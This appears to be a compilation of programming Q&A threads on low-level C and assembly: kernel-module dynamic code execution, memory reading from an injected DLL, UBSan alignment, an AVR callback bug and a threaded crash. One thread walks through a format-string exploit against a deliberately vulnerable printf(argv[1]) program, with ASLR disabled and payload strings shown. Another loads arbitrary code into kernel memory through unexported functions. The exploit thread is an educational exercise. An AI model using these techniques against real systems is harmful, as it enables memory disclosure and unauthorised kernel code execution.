tl;dr : I'm trying to execute dynamically some code from another snippet. But I am stuck with handling memory reference (e.g. mov 40200b, %rdi): can I patch my code or the snippet running code so that 0x40200b is resolved correctly (as the offset 200b from the code)?
To generate the code to be executed dynamically I start from a (kernel) object and I resolve the references using ld.
#!/usr/bin/python
import os, subprocess
if os.geteuid() != 0:
print('Run this as root')
exit(-1)
with open("/proc/kallsyms","r") as f:
out=f.read()
sym= subprocess.Popen( ['nm', 'ebbchar.ko', '-u' ,'--demangle', '-fposix'],stdout=subprocess.PIPE)
v=''
for sym in sym.stdout:
s = " "+ sym.split()[0]+ "\n"
off = out.find(s)
v += "--defsym "+s.strip() + "=0x" +out[off-18:off -2]+" "
print(v)
os.system("ld ebbchar.ko "+ v +"-o ebbchar.bin");
I then transmit the code to be executed with through a mmaped file
int fd = open(argv[1], O_RDWR | O_SYNC);
address1 = mmap(NULL, page_size, PROT_WRITE|PROT_READ , MAP_SHARED, fd, 0);
int in=open(argv[2],O_RDONLY);
sz= read(in, buf+8,BUFFER_SIZE-8);
uint64_t entrypoint=atol(argv[3]);
*((uint64_t*)buf)=entrypoint;
write(fd, buf, min(sz+8, (size_t) BUFFER_SIZE));
I execute code dynamycally with this code
struct mmap_info *info;
copy_from_user((void*)(&info->offset),buf,8);
copy_from_user(info->data, buf+8, sz-8);
unsigned long (*func)(void) func= (void*) (info->data + info->offset);
int ret= func();
This approch work for code that don't access memory such as "\x55\x48\x89\xe5\xc7\x45\xf8\x02\x00\x00\x00\xc7\x45\xfc\x03\x00\x00\x00\x8b\x55\xf8\x8b\x45\xfc\x01\xd0\x5d\xc3" but I have problems when memory is involved.
See example below.
Let's assume i wan't execute dynamically the function vm_close. Objdump -d -S returns:
0000000000401017 <vm_close>:
{
401017: e8 e4 07 40 81 callq ffffffff81801800 <__fentry__>
printk(KERN_INFO "vm_close");
40101c: 48 c7 c7 0b 20 40 00 mov $0x40200b,%rdi
401023: e9 b6 63 ce 80 jmpq ffffffff810e73de <printk>
At execution, my function pointer points to the right code:
(gdb) x/12x $rip
0xffffc90000c0601c: 0x48 0xc7 0xc7 0x0b 0x20 0x40 0x00 0xe9
0xffffc90000c06024: 0xb6 0x63 0xce 0x80
(gdb) x/2i $rip
=> 0xffffc90000c0601c: mov $0x40200b,%rdi
0xffffc90000c06023: jmpq 0xffffc8ff818ec3de
BUT, this code will fail since:
1) In my context $0x40200b points at the physical address $0x40200b, and not offset 200b from the beginning of the code.
2) I don't understand why but the address displayed there is actually different from the correct one (0xffffc8ff818ec3de != ffffffff810e73de) so it won't point on my symbol and will crash.
Is there a way to solve my 2 issues?
Also, I had trouble to find good documentation related to my issue (low-level memory resolution), if you could give me some, that would really help me.
Edit: Since I run the code in the kernel I cannot simply compile the code with -fPIC or -fpie which is not allowed by gcc (cc1: error: code model kernel does not support PIC mode)
Edit 24/09:
According to #Peter Cordes comment, I recompiled it adding mcmodel=small -fpie -mno-red-zone -mnosse to the Makefile (/lib/modules/$(uname -r)fixed/build/Makefile)
This is better than in the original version since the generated code before linking is now:
0000000000000018 <vm_close>:
{
18: ff 15 00 00 00 00 callq *0x0(%rip) # 1e <vm_close+0x6>
printk(KERN_INFO "vm_close");
1e: 48 8d 3d 00 00 00 00 lea 0x0(%rip),%rdi # 25 <vm_close+0xd>
25: e8 00 00 00 00 callq 2a <vm_close+0x12>
}
2a: c3 retq So thanks to rip-relative addressing
Thus I’m now able to access the other variables on my script…
Thus, after linking I can successfully access my variable embedded within the buffer.
40101e: 48 8d 3d e6 0f 00 00 lea 0xfe6(%rip),%rdi # 40200b
Still, one problem remains:
The symbol I want to access (printk) and my executable buffer are in different address spaces, for exemple:
printk=0xffffffff810e73de:
Executable_buffer=0xffffc9000099d000
But in my callq to printk, I have only 32 bits to write the address to call as an offset from $rip since there is no .got section in the kernel. This means that printk has to be located within [$rip-2GO, $rip+2GO]. But this is not the case there.
Do I have a way to access the printk address although they are located more than 2GO away from my buffer (I tried to used mcmodel=medium but I haven't seen any difference in the generated code), for instance by modifying gcc options so that the binary actually have a .got section?
Or is there a reliable way to force my executable and potentially-too large-for-kmalloc buffer to be allocated in the [0xffffffff00000000 ; 0xffffffffffffffff] range? (I currently use __vmalloc(BUFFER_SIZE, GFP_KERNEL, PAGE_KERNEL_EXEC); )
Edit 27/09:
I succedded in allocationg my buffer in the [0xffffffff00000000 ; 0xffffffffffffffff] range using the non exported __vmalloc_node_range function as a (dirty) hack.
IMPORTED(__vmalloc_node_range)(BUFFER_SIZE, MODULE_ALIGN,
MODULES_VADDR + get_module_load_offset(),
MODULES_END, GFP_KERNEL,
PAGE_KERNEL_EXEC, 0, NUMA_NO_NODE,
__builtin_return_address(0));
Then, when I know the address of my executable buffer and the address of the kernel symbols (by parsing /proc/kallsyms), I can patch my binary using ld’s option --defsym symbol=relative_address where relative_address = symbol_address - buffer_offset .
Despite being extremely dirt, this approach actually works.
But I need to relink my binary each time I execute it since the buffer may (and will) be allocated at a different address. To solve this issue, I think the best way would be to build my executable as a real position independent executable so that I can just patch the global offset table and not fully relink the module.
But with the options provided there I got a rip-relative address but no got/plt. So I'd like to find a way to build my module as a proper PIE.
This post is getting huge, messy and we are deviating from the original question. Thus, I opened a new simplified post there. If I get interesting answers, I'll edit this post to explain them.
Note: For the sake of simplicity, safety tests are not displayed there
Note 2: I am perfectly aware that my PoC is very unusual and can be a bad practice but I'd like to do it anyway.
Related
working on my reversing skillset here and I came upon something I thought i understood but I managed to confuse myself.
Working in C mainly
My function returns me an address for the information I want to access.
LRESULT ret = SendMessage(hComboBox, CB_GETITEMDATA, (WPARAM)0 , (LPARAM) 0);
// the exact function doesn't really matter here.
printf("Address: %p\n", ret); // Output is 09437DF8
A dump of this address results in
09437DF8 A0 55 E8 12
This is the address (note endianness) of the data I really want to read.
12e855A0
12 E8 55 A0 - 30 00 3A 00 30 00 33 00 3A 00 32 00 32 00 00 00 - UNICODE "0:03:22"
Now I'm fairly certain this is just basic pointers/referencing/de-referencing but i cant wrap my head what I have to do to read this value pragmatically.
wprintf(L"%s\n", <value at address pointed to by ret>);
// Yes its a null terminated string
// Im working via injected dll, so no access violations
// string is unicode
Perhaps something like this?
#include <stdio.h>
#include <wchar.h>
int main()
{
wchar_t *name = L"UNICODE String";
void **ret = (void **)&name;
wprintf(L"%ls \n", *(wchar_t **)ret);
return 0;
}
I've been running some code under UBSan, and found an error which I've never seen before:
/usr/include/c++/7/bits/stl_algobase.h:324:8: runtime error: store to misaligned address 0x611000001383 for type 'struct complex', which requires 4 byte alignment
0x611000001383: note: pointer points here
66 46 40 02 00 00 00 00 00 00 00 00 04 01 18 00 08 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00
^
(g++-7.3.0, Ubuntu 18.04, flags -fsanitize=address -fsanitize=undefined)
What does this error mean? Is it truly an error (it is in the standard library, so it can't be too bad, right?), and should I care about it?
You probably use a pointer cast which casts a block of raw memory to a complex*.
Example:
void* raw = getBuffer(); // Made up function which returns a buffer
auto size = *static_cast<uint16_t>*(raw); // Maybe your format says that you got a 2 Byte size in front
auto* array = static_cast<complex*>(raw+sizeof(uint16_t)); // ... and complex numbers after
std::transform(array, array+size, ...); // Pass this into STL
Boom! You got UB.
Why?
The behavior is undefined in the following circumstances: [...]
Conversion between two pointer types produces a result that is incorrectly aligned
[...]
If the resulting pointer is not correctly aligned [68] for the referenced type, the behavior is undefined.
See https://stackoverflow.com/a/46790815/1930508 (where I got these from)
What does it mean?
Every pointer must be aligned to the type it is pointing to. For complex this means an alignment of 4. In short this means that array (from above) must be evenly divisible by 4 (aka array % 4 == 0) Assuming that raw is aligned to 4 bytes you can easily see that array cannot as (raw + 2) % 4 == 2 (because of raw % 4 == 2)
If the size would be a 4-Byte value, then array would have been aligned if (and only if) raw was aligned. Whether this is guaranteed depends on where it comes from.
So yes this is truly an error and may lead to a real bug although not always (depending on moon phase etc. as it is always with UB, see the answer above for details)
And no it is NOT in the STL, it just happens to be detected there because UBSAN watches memory dereferences. So while the actual UB is the static_cast<complex*> it is only detected when reading from that pointer.
You can use export UBSAN_OPTIONS=print_stacktrace=1 prior to executing the program to get a stacktrace and find out where your wrong cast is.
Tip: You only need to check casts. Any struct/type allocated via new is always aligned (and every member inside), unless tricks like "packed structs" are used.
I'm trying to exploit a format string vulnerability just for exercise but something is going wrong. My goal is to exploit such a bug in order to read from a certain address chosen by me.
This is the code I'm trying to exploit:
#include <stdio.h>
void main(int argv, char *argv[]){
printf(argv[1]);
}
This program is running on a x86 machine mounting a 2.6.20 linux kernel.
I'm tring to print the bytes stored at the address 0x80483cb, which belongs to the code section:
...
80483cb: e8 e8 fe ff ff call 80482b8 <printf#plt>
80483cb: e8 e8 fe ff ff call 80482b8 <printf#plt>
80483d0: 83 c4 10 add $0x10,%esp
80483d3: b8 00 00 00 00 mov $0x0,%eax
...
Just to be sure I've also disabled the ASLR with:
echo 0 > /proc/sys/kernel/randomize_va_space
I've found the exact location where to store the memory address doing:
./print AAAA`perl -e 'print "%08x."x141'`
AAAA00000000.bffff0a8.080483fb.b7fcaffc.b7fcaffc.080494e8.b7fcaffc.00000000.b8000ce0.
bffff108.b7eb4e14.00000002.bffff134.bffff140.b7ff5b6c.b7fcaffc.00000000.bffff0c0.bffff108.
bffff0b0.b7eb4dd2.00000000.00000000.00000000.b8000ff8.00000002.080482d0.00000000.b7ff5aa0.
b7ff66b0.b8000ff8.00000002.080482d0.00000000.080482f1.080483a4.00000002.bffff134.080483e0.
08048440.b7ff66b0.bffff12c.b7ffee8e.00000002.bffff2ac.bffff2b4.00000000.bffff57a.bffff5dd.
bffff5f1.bffff5f8.bffff605.bffff615.bffff620.bffff674.bffff6bb.bffff6db.bffff6ef.bffff701.
bffff711.bffff729.bffff749.bffff761.bffff777.bffff781.bffffc71.bffffc7f.bffffc8f.bffffcbc.
bffffce7.bffffd08.bffffd33.bffffd41.bffffd5b.bffffe56.bffffe8b.bffffea0.bffffeba.bffffed2.
bfffff0a.bfffff11.bfffff19.bfffff24.bfffff3a.bfffff5f.bfffff67.bfffff74.bfffff82.bfffff9e.
bfffffb7.bfffffc2.bfffffcd.bfffffea.00000000.00000020.b7fe9400.00000021.b7fe9000.00000010.
078bfbff.00000006.00001000.00000011.00000064.00000003.08048034.00000004.00000020.00000005.
00000007.00000007.b7fea000.00000008.00000000.00000009.080482d0.0000000b.00000000.0000000c.
00000000.0000000d.00000000.0000000e.00000000.00000017.00000000.0000000f.bffff29b.00000000.
00000000.00000000.00000000.00000000.69000000.00363836.00000000.00000000.00000000.72702f2e.
00746e69.41414141.
Finally I tried to print the above bytes doing:
./print $(printf "\xcb\x83\x04\x08")`perl -e 'print "%08x."x140 . "%s"'`
But what I got is a fault before to be able to see those bytes:
00000000.bffff0a8.080483fb.b7fcaffc.b7fcaffc.080494e8.b7fcaffc.00000000.b8000ce0.bffff108.
b7eb4e14.00000002.bffff134.bffff140.b7ff5b6c.b7fcaffc.00000000.bffff0c0.bffff108.bffff0b0.
b7eb4dd2.00000000.00000000.00000000.b8000ff8.00000002.080482d0.00000000.b7ff5aa0.b7ff66b0.
b8000ff8.00000002.080482d0.00000000.080482f1.080483a4.00000002.bffff134.080483e0.08048440.
b7ff66b0.bffff12c.b7ffee8e.00000002.bffff2af.bffff2b7.00000000.bffff57a.bffff5dd.bffff5f1.
bffff5f8.bffff605.bffff615.bffff620.bffff674.bffff6bb.bffff6db.bffff6ef.bffff701.bffff711.
bffff729.bffff749.bffff761.bffff777.bffff781.bffffc71.bffffc7f.bffffc8f.bffffcbc.bffffce7.
bffffd08.bffffd33.bffffd41.bffffd5b.bffffe56.bffffe8b.bffffea0.bffffeba.bffffed2.bfffff0a.
bfffff11.bfffff19.bfffff24.bfffff3a.bfffff5f.bfffff67.bfffff74.bfffff82.bfffff9e.bfffffb7.
bfffffc2.bfffffcd.bfffffea.00000000.00000020.b7fe9400.00000021.b7fe9000.00000010.078bfbff.
00000006.00001000.00000011.00000064.00000003.08048034.00000004.00000020.00000005.00000007.
00000007.b7fea000.00000008.000Segmentationfault
What I expected was to get on screen a set of chars which are the bytes from the address used until the first \x00, What am I doing wrong?
This would work if you wouldn't change the length of your argument.
You remove one %08x. and add one %s. This makes your input 3 bytes shorter, effectively changing the stack layout. So you are likely not hitting the right address anymore.
I recommend writing a small script that will always pad your string to a fixed size. This helps to avoid such changes.
Keep in mind that changing your environment ($PWD (cd ..), adding/removing environment variables, etc.) will also change the stack layout. Resetting the environment can be of help here (env -i).
Here is a run of the vuln program without changing the length of the argument:
$ ./nagga $(printf "\x41\x41\x41\x41")XXperl -e 'print "%x."x118 . "%x"';
AAAAXX0.8048409.f7fceff4.8048400.0.0.f7e454b3.2.ffffd6b4.ffffd6c0.f7fd3000.0.ffffd61c.ffffd6c0.0.804821c.f7fceff4.0.0.0.c1a6169f.f6a2b28f.0.0.0.2.8048330.0.f7ff0a90.f7e453c9.f7ffcff4.2.8048330.0.8048351.80483e4.2.ffffd6b4.8048400.8048470.f7feb660.ffffd6ac.f7ffd918.2.ffffd7d4.ffffd7dc.0.ffffd947.ffffd952.ffffd962.ffffd984.ffffd997.ffffd9a1.ffffdec2.ffffded6.ffffdf23.ffffdf2d.ffffdf3e.ffffdf46.ffffdf51.ffffdf63.ffffdf70.ffffdfa4.ffffdfc4.ffffdfe6.0.20.f7fdb420.21.f7fdb000.10.78bfbff.6.1000.11.64.3.8048034.4.20.5.9.7.f7fdc000.8.0.9.8048330.b.0.c.0.d.0.e.0.17.0.19.ffffd7bb.1f.ffffdff0.f.ffffd7cb.0.0.0.0.0.f4000000.2b137f67.69b01f05.93944d19.697a2611.363836.0.616e2f2e.616767.41414141
$ ./nagga $(printf "\x70\x84\x04\x08")XXperl -e 'print "%x."x118 . "%s"';
p�XX0.8048409.f7fceff4.8048400.0.0.f7e454b3.2.ffffd6b4.ffffd6c0.f7fd3000.0.ffffd61c.ffffd6c0.0.804821c.f7fceff4.0.0.0.187cff94.2f785b84.0.0.0.2.8048330.0.f7ff0a90.f7e453c9.f7ffcff4.2.8048330.0.8048351.80483e4.2.ffffd6b4.8048400.8048470.f7feb660.ffffd6ac.f7ffd918.2.ffffd7d4.ffffd7dc.0.ffffd947.ffffd952.ffffd962.ffffd984.ffffd997.ffffd9a1.ffffdec2.ffffded6.ffffdf23.ffffdf2d.ffffdf3e.ffffdf46.ffffdf51.ffffdf63.ffffdf70.ffffdfa4.ffffdfc4.ffffdfe6.0.20.f7fdb420.21.f7fdb000.10.78bfbff.6.1000.11.64.3.8048034.4.20.5.9.7.f7fdc000.8.0.9.8048330.b.0.c.0.d.0.e.0.17.0.19.ffffd7bb.1f.ffffdff0.f.ffffd7cb.0.0.0.0.0.f000000.5f19366a.9135f3e8.e60e0ac6.69afc87d.363836.0.616e2f2e.616767.�Ë$Ð���������U��S�������t��f����Ћ���u���[]Ð�S��r
Works as expected.
I am writing a callback function in C. It is intended to initialise an I2C sensor, and it called at the conclusion of each (split-phase) configuration step; after the 9th call, the device is almost ready to use.
The basic idea of the function is this:
void callback(void)
{
static uint8_t calls = 0;
if (++calls == 9) {
// Finalise device setup (literally a single line of code)
}
}
My problem is that the above if statement is never being entered, despite the function being called 9 times.
The (dis)assembly code for my function seems sane (with the exception of the subi . 0xFF trick for an increment, despite the inclusion of an inc instruction):
00000a4c <callback>:
a4c: 80 91 9e 02 lds r24, 0x029E
a50: 8f 5f subi r24, 0xFF ; 255
a52: 80 93 9e 02 sts 0x029E, r24
a56: 89 30 cpi r24, 0x09 ; 9
a58: 09 f0 breq .+2 ; 0xa5c <callback+0x10>
a5a: 08 95 ret
a5c: 2e e1 ldi r18, 0x1E ; 30
a5e: 35 e0 ldi r19, 0x05 ; 5
a60: 41 e0 ldi r20, 0x01 ; 1
a62: 60 e0 ldi r22, 0x00 ; 0
a64: 84 e7 ldi r24, 0x74 ; 116
a66: 0c 94 c7 02 jmp 0x58e ; 0x58e <twi_set_register>
I am writing the code for an Atmel AVR chip, and thus compiling with avr-gcc. I have no meaningful code debugging capabilities (I don't have access to a JTAG programmer, and the function is asynchronous/split-phase in any case; USART printing is too slow).
However, I have access to a logic analyser, and have been able to determine a number of things by placing while (1) ; statements inside the code:
the function is called - if I place an infinite loop at the start of the function, the microcontroller hangs
the function should be called 9 times - the trigger for the function is an I2C communication, and in the previous step it hangs immediately after the first communication; I can observe 9 complete and valid I2C communications
calls is incremented within the function - if I add if (calls == 0) { while (1) ; } after the increment, it does not hang
calls is never non-zero at the start of the function - if I add if (calls) { while(1) ; } before the increment, it does not hang
I'm completely at a loss for ideas.
Does anyone have any suggestions as to what could cause this, or even for new debugging steps I could take?
I ended up finding the cause of the error; another subsystem was breaking as a side-effect of the first call to the callback function, meaning that no other calls succeeded.
This explains the behaviours I saw:
it hung the first time because it was actually being called
it didn't hang the second time (or any future time) because it was only being called once
the I2C transactions I was observing were occurring, but their callback mechanism was not operating correctly, due to the other subsystem (tasks) breaking
I was able to work this out by using a few GPIO pins as debugging toggles, and thus tracking how the call was progressing through the TWI interface.
Thanks for the help guys. This isn't really an answer to the original question as posed, but it is solved, so that's something :)
For what you say I can only think of 3 possibilities: 1) your assumption that the function is being called on every I2C communication is incorrect, 2) your program has a bug (maybe a memory leak) in some unrelated function which causes the variable calls to become corrupted. or 3) two or more threads are calling your function simultaneously and calls is being incremented in a different way than you expect, use > instead of ==, if this solves the problem, then you are running in a milti-threaded environment and you didn't konw.
You need an accurate method to know the exact value of calls, if you don't have a debugger and don't have the means to output text either, the only thing you have left to play is time. I don't know you compiler, but I am sure it contains some useful timing functions, so what I would do would be to loop before increment for 10+calls seconds, and after increment again 10+calls seconds, for example:
sleep(1000*(10+calls));
++calls;
sleep(1000*(10+calls));
if(calls>8){
// your actual code
}
I would (chronometer in hand) expect a delay of (10+0 plus 10+1) = 21 seconds on the first call, 23 seconds on the second call, 25 in the third and so on. That way I could be sure the value of calls started with 0 and then it was progressively increased until 9.
Also, you must test for what you expect not for what you don't expect, so instead of doing this:
++calls;
if (calls==0) while (1);
do this:
++calls;
if (calls==1) while (1);
that way if your program hangs you can be sure the value of calls is exactly 1, and not whatever different from zero. If you count one valid I2C communication and your program hangs then the transition from 0 to 1 was done correctly, so change the hang statement accordingly:
++calls;
if (calls==2) while (1);
Again, if you count 2 valid I2C communications before your program hangs that means that the transition from 1 to 2 was correct, and so on.
Another suggestion, try this:
uint8_t Times(void){
static uint8_t calls = 0;
return ++calls;
}
void callback(void){
if (Times()>8) {
// Your actual code
}
}
And this:
void callback(void){
static uint8_t calls = 0;
if (calls++>7) {
// some code.
}
}
Hope this helps.
Backtrace of the coredump:
#0 0x0000000000416228 in add_to_epoll (struct_fd=0x18d32760, lno=7901) at lbi.c:7092
#1 0x0000000000418b54 in connect_fc (struct_fd=0x18d32760, type=2) at lbi.c:7901
#2 0x0000000000418660 in poll_fc (arg=0x0) at lbi.c:7686
#3 0x00000030926064a7 in start_thread () from /lib64/libpthread.so.0
#4 0x0000003091ed3c2d in clone () from /lib64/libc.so.6
Code Snippet:
#define unExp(x) __builtin_expect((x),0)
...
7087 int add_to_epoll( struct fdStruct * struct_fd, int lno)
7088 {
7089 struct epoll_event ev;
7090 ev.events = EPOLLIN | EPOLLET | EPOLLPRI | EPOLLERR ;
7091 ev.data.fd = fd_st->fd;
7092 if (unExp(epoll_ctl(struct_fd->Hdr->info->epollfd, EPOLL_CTL_ADD, struct_fd->fd,&ev) == -1))
7093 {
7094 perror("client FD ADD to epoll error:");
7095 return -1;
7096 }
7097 else
7098 {
...
7109 }
7110 return 1;
7111 }
Disassembly of the offending line. I am not good at interpreting assembly code but have tried my best:
if (unExp(epoll_ctl(struct_fd->Hdr->info->epollfd, EPOLL_CTL_ADD, stuct_fd->fd,&ev) == -1))
416210: 48 8b 45 d8 mov 0xffffffffffffffd8(%rbp),%rax // Storing struct_fd->fd
416214: 8b 10 mov (%rax),%edx // to EDX
416216: 48 8b 45 d8 mov 0xffffffffffffffd8(%rbp),%rax // Storing struct_fd->Hdr->info->epollfd
41621a: 48 8b 80 e8 01 00 00 mov 0x1e8(%rax),%rax // to EDI which failed
416221: 48 8b 80 58 01 00 00 mov 0x158(%rax),%rax // while trying to offset members of the structure
416228: 8b 78 5c mov 0x5c(%rax),%edi // <--- failed here since Reg AX is 0x0
41622b: 48 8d 4d e0 lea 0xffffffffffffffe0(%rbp),%rcx
41622f: be 01 00 00 00 mov $0x1,%esi
416234: e8 b7 e1 fe ff callq 4043f0 <epoll_ctl#plt>
416239: 83 f8 ff cmp $0xffffffffffffffff,%eax
41623c: 0f 94 c0 sete %al
41623f: 0f b6 c0 movzbl %al,%eax
416242: 48 85 c0 test %rax,%rax
416245: 74 5e je 4162a5 <add_to_epoll+0xc9>
Printing out Registers and struct member values:
(gdb) i r $rax
rax 0x0 0
(gdb) p struct_fd
$3 = (struct fdStruct *) 0x18d32760
(gdb) p struct_fd->Hdr
$4 = (StHdr *) 0x3b990f30
(gdb) p struct_fd->Hdr->info
$5 = (struct Info *) 0x3b95b410 // Strangely, this is NOT NULL. Inconsistent with assembly dump.
(gdb) p ev
$6 = {events = 2147483659, data = {ptr = 0x573dc648000003d6, fd = 982, u32 = 982, u64= 6286398667419026390}}
Please let me know if my dis-assembly interpretation is OK. And if yes, would like to understand why gdb not showing NULL when it is printing out the structure members.
OR if the analysis is not perfect would like to know the actual reason of coredump. Please let me know if you need more info.
Thanks
---- The following part has been added Later ----
The proxy is a multithreaded program. Doing more digging came to know that when the problem occurs the following two thread were running in parallel. And when I avoid the two functions to run parallely the problem never occurs. But, the thing is I cannot explain how this behavior results into the original problematic scene:
Thread 1:
------------------------------------------------------------
int new_connection() {
...
struct_fd->Hdr->info=NULL; /* (line 1) */
...
<some code>
...
struct_fd->Hdr->info=Golbal_InFo_Ptr; /* (line 2) */ // This is a malloced memory, once allocated never freed
...
...
}
------------------------------------------------------------
Thread 2 executing add_to_epoll():
------------------------------------------------------------
int add_to_epoll( struct fdStruct * struct_fd, int lno)
{
...
if (unExp(epoll_ctl(struct_fd->Hdr->info->epollfd,...) /* (line 3) */
...
}
------------------------------------------------------------
In the above snippets if execution is done in the order,
LIne 1,
Line 3,
Line 2,
the scene can occur. What I expect is whenever an illegal reference is encountered it should dump immediately without trying to execute LINE 3 which makes it NON NULL.
It is a definite behavior because till now I have got around 12 coredumps of the same problem, all showing the exact same thing.
It is clear that struct_fd->Hdr->info is NULL, as Per Johansson already answered.
However, GDB thinks that it is not. How could that be?
One common way this happens, is when
you change the layout of struct fdStruct, struct StHdr (or both),
and
you neglect to rebuild all objects that use these definitions
The disassembly shows that offsetof(struct fdStruct, Hdr) == 0x1e8 and offsetof(struct StHdr, info) == 0x158. See what GDB prints for the following:
(gdb) print/x (char*)&struct_fd->Hdr - (char*)struct_fd
(gdb) print/x (char*)&struct_fd->Hdr->info - (char*)struct_fd->Hdr
I bet it would print something other than 0x1e8 and 0x158.
If that's the case, make clean && make may fix the problem.
Update:
(gdb) print/x (char*)&struct_fd->Hdr - (char*)struct_fd
$1 = 0x1e8
(gdb) print/x (char*)&struct_fd->Hdr->info - (char*)struct_fd->Hdr
$3 = 0x158
This proves that GDB's idea of how objects are laid out in memory matches compiled code.
We still don't know whether GDB's idea of the value of struct_fd matches reality. What do these commands print?
(gdb) print struct_fd
(gdb) x/gx $rbp-40
They should produce the same value (0x18d32760). Assuming they do, the only other explanation I can think of is that you have multiple threads accessing struct_fd, and the other thread overwrites the value that used to be NULL with the new value.
I just noticed your update to the question ;-)
What I expect is whenever an illegal reference is encountered it should dump immediately without trying to execute LINE 3 which makes it NON NULL.
Your expectation is incorrect: on any modern CPU, you have multiple cores, and your threads are executing simultaneously. That is, you have this code (time goes down along Y axis):
char *p; // global
Time CPU0 CPU1
0 p = NULL
1 if (*p) p = malloc(1)
2 *p = 'a';
...
At T1, CPU0 traps into the OS, but CPU1 continues. Eventually, the OS processes hardware trap, and dumps memory state at that time. On CPU1, hundreds of instructions may have executed after T1. The clocks between CPU0 and CPU1 aren't even synchronized, they don't necessarily go in lock-step.
Moral of the story: don't access global variables from multiple threads without proper locking.
The C line part of the disassembly does not match the one in the original code. But clearly
struct_fd->Hdr->info
is NULL. gdb shouldn't have a problem printing that, but it does sometimes get confused when the code is compiles with -O2 or higher.